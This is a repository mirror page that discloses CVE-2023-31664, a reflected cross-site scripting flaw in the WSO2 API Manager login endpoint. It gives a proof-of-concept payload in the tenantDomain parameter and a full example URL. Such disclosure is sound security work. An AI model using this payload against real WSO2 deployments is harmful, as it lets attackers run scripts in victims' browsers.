Giters

adilkhan7 / CVE-2023-31664

CVE-2023-31664 WSO2

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2023-31664

CVE-2023-31664 A reflected cross-site scripting (XSS) vulnerability in /authenticationendpoint/login.do of WSO2 Api Manager below v4.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tenantDomain parameter.

PoC: to exploit it only needs change the value of tenantDomain parameter from super.carbon to </script><script>alert(document.domain)</script>

Example: https://host/authenticationendpoint/login.do?client_id=..TRUNCATED...+openid&state=%2F&tenantDomain=</script><script>alert(document.domain)</script>&sessionDataKey=00000000000&relyingParty=AaAaAaAaA&type=oidc&sp=apim_admin_portal&isSaaSApp=true&authenticators=BasicAuthenticator

Reported by: na1man

About

CVE-2023-31664 WSO2